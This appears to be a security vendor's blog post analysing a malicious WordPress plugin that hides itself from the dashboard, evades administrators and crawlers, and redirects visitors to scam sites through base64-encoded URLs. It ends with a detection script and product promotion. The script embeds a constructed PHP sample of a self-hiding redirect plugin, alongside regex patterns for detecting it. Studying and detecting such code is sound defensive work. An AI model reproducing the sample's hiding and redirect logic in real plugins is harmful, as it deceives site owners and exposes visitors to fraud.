We've discussed malicious HTTP redirection in generic terms before. A malicious traffic redirect can happen through compromised or outright fraudulent code that website owners and administrators unknowingly install on their own sites. A common route is third-party plugins for content management systems like WordPress. A plugin promises some useful new functionality for the site owner or its visitors; eager for the enhancement, the owner installs it, unaware that they've also installed malware that lurks in the background. Such is the case with the plugin we'll be discussing, Zend Fonts WP.
The Basics of Zend Fonts WP
This malware masquerades as a legitimate WordPress plugin and uses tricks that are fairly common in malicious code. The first is to present itself as legitimate. It does this with a header comment in its source file that looks identical to what a genuine plugin contains: the name of the plugin, a URI for more information, the name of the author, and so on. WordPress reads these fields to populate the Plugins screen, but it does not verify any of them, so the information is all fake. The developers of this code are clever and would not put any real identifying information in it; the presence of the header simply gives the illusion that the malware-laden plugin is as legitimate as any other.
Malware Hiding in Plain Site
The WordPress dashboard gives administrators the ability to add, view, and remove the plugins installed on a site. This is, of course, a necessary part of site administration. But it's not very convenient for a bad actor if you can simply remove their malware and go about your day. To get around this, Zend Fonts WP hooks a filter on the list WordPress builds for the Plugins screen and unsets its own entry from it. When an administrator opens the dashboard to view the installed plugins, Zend Fonts WP isn't there. Administrators can't remove a plugin they can't see, unless they know to look at the PHP files directly: the plugin's directory still exists under wp-content/plugins, so a listing over SSH or SFTP reveals what the dashboard hides.
The following code snippet presents the plugin's callback function, which WordPress invokes when a website administrator tries to list all installed plugins:
Deeper Layers of Cover
If a site administrator were to visit their own web address and find themselves redirected to some scam-bait website instead, the game would be up for the malware. So, in addition to hiding itself from the administrator's view on the WordPress dashboard, Zend Fonts WP checks whether the visitor is logged in as an administrator. If they are, it stays inactive, keeping its presence and functionality hidden for as long as possible.
This particular malware takes that common tactic a step further. When someone logs in as an administrator, it stores a record of that user's IP address and user agent. With that fingerprint it can keep avoiding those people on later visits that the logged-in check alone would not catch.
This code records the admin users and skips the redirect for them:
It also stays inactive if the visitor is a web crawler rather than a human. Crawlers don't fall for scam websites, don't bring in advertising dollars, and may alert the site owners to the threat. Finally, once it's convinced the visitor is a valid mark, it waits until their second page view before sending the redirect, and it sets a cookie so the redirect doesn't recur often enough for the visitor to contact the site administrators and report something wrong.
Finally, we get to the redirection part of the code.
A PHP file filled with plain-text addresses of scammy-sounding websites would also make the threat easier to detect, so Zend Fonts WP encodes the URLs with base64. To anyone who doesn't know better, the URL information looks like random alphanumeric characters, and since it isn't uncommon to encode data this way, it is much less suspicious than exposed URLs would be. Base64 is an encoding, not encryption, though: anything passed to base64_decode can be decoded by the reviewer just as easily as by the malware, so a string literal in that call that decodes to an http(s) URL next to a Location header is a strong indicator.
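The self-hiding filter, the admin and bot gating, and the base64-wrapped redirect target described above are all visible in a plugin's source once you know what to look for. The following static triage script is an added example, not Quttera's scanner and not the Zend Fonts WP source: the plugin text it scans is constructed here to reproduce the behaviours this post describes, and every name and URL in it (Example Fonts, example.invalid, the _ef_seen cookie) is made up for illustration.

```python
"""Static triage of a WordPress plugin file for the indicators described above.

Added example, not Quttera's scanner and not the Zend Fonts WP source. The
sample plugin below is constructed to reproduce the behaviours the post
describes: a plausible header, self-removal from the Plugins screen, admin
and bot gating, cookie throttling, and a base64-wrapped redirect target.
"""
import base64
import binascii
import re

# Constructed sample input (hypothetical; example.invalid is a reserved name).
SAMPLE_PLUGIN = r'''<?php
/*
Plugin Name: Example Fonts
Plugin URI: https://example.invalid/fonts
Description: Adds web fonts.
Author: Example Author
*/
add_filter('all_plugins', function ($plugins) {
    unset($plugins[plugin_basename(__FILE__)]);   // vanish from the dashboard list
    return $plugins;
});
add_action('init', function () {
    if (is_user_logged_in() && current_user_can('manage_options')) { return; }
    if (preg_match('/bot|crawl|spider/i', $_SERVER['HTTP_USER_AGENT'])) { return; }
    if (!empty($_COOKIE['_ef_seen'])) { return; }
    setcookie('_ef_seen', '1', time() + 86400, '/');
    $target = base64_decode('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbGFuZGluZw==');
    header('Location: ' . $target);
    exit;
});
'''

# Header fields WordPress reads from the leading comment block.
HEADER_RE = re.compile(
    r"^\s*\*?\s*(Plugin Name|Plugin URI|Description|Author)\s*:\s*(.+?)\s*$", re.M)
# A base64 literal handed straight to base64_decode().
B64_CALL_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]")
# Ways a plugin can send the browser elsewhere.
REDIRECT_RE = re.compile(r"header\(\s*['\"]Location:|wp_redirect\(|wp_safe_redirect\(", re.I)
# Filter on the list the Plugins screen displays.
HIDE_RE = re.compile(r"add_filter\(\s*['\"]all_plugins['\"]")
# Checks used to stay quiet for administrators.
ADMIN_RE = re.compile(r"is_user_logged_in\(|current_user_can\(|is_admin\(")
# A preg_match() whose pattern names common crawler user agents.
BOT_RE = re.compile(r"preg_match\([^)]*(bot|crawl|spider)", re.I)


def plugin_header(src: str) -> dict:
    """Parse the header comment WordPress uses to list a plugin. The values are
    whatever the author typed, so they prove nothing about legitimacy."""
    return {key: value for key, value in HEADER_RE.findall(src)}


def decoded_urls(src: str) -> list:
    """Return every base64_decode() literal that decodes to an http(s) URL."""
    urls = []
    for blob in B64_CALL_RE.findall(src):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64; ignore
        if re.match(rb"https?://", raw, re.I):
            urls.append(raw.decode("ascii", "replace"))
    return urls


def scan(src: str) -> dict:
    """Score a plugin's source against the behaviours described in the post."""
    urls = decoded_urls(src)
    indicators = {
        "hides_from_plugin_list": bool(HIDE_RE.search(src)) and "unset(" in src,
        "redirects": bool(REDIRECT_RE.search(src)),
        "base64_url": bool(urls),
        "admin_gated": bool(ADMIN_RE.search(src)),
        "bot_gated": bool(BOT_RE.search(src)),
        "cookie_throttled": "setcookie(" in src and "$_COOKIE" in src,
    }
    return {
        "header": plugin_header(src),
        "indicators": indicators,
        "urls": urls,
        "score": sum(indicators.values()),
    }


if __name__ == "__main__":
    result = scan(SAMPLE_PLUGIN)
    print(result["header"].get("Plugin Name"), "score:", result["score"])
    for name, hit in result["indicators"].items():
        print(f"  {name}: {hit}")
    print("  decoded redirect targets:", result["urls"])
```

Run it over each file under wp-content/plugins rather than over the dashboard's list, since the dashboard is exactly what the malware filters. Treat the score as triage, not proof: a single indicator such as base64_decode or current_user_can is common in benign plugins, and a string-matching pass misses targets that are assembled at runtime or hidden behind eval, so a high score should lead to reading the file, not directly to a verdict.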
The websites it redirects to run the gamut of spam sites. Some are filled to the brim with referral URLs that try to make money from users. Others are fake surveys that promise rewards but really exist to extract personal information from the visitor. Once acquired, that information is certain to be used for further nefarious goals.
Stop Threats Like This and More with Quttera Website Protection Services
As you've seen, developers of malicious code are sneaky. They deploy many tricks to ensure that human eyes don't find their code and end their activity. Quttera's ThreatSign provides client websites with a pair of computer eyes and ears. It scans the entire site, looking for threats such as skimmers, malvertising, zero-day threats, and more. The multi-layered analysis in ThreatSign detects even well-hidden code. Once it does, the system issues a report pinpointing what it found so your clients can take action to remove the offending code.
Malicious code can also lead to an infected site being blacklisted. When this happens, visibility in search engines plummets, taking site traffic with it. By monitoring for the blacklisting of a site, ThreatSign quickly gives an administrator a heads up when their site has been blacklisted, allowing them to take the necessary steps to get back in good standing.
ThreatSign comes in plans to suit businesses of every size and easily pays for itself by reducing downtime and the need for emergency action.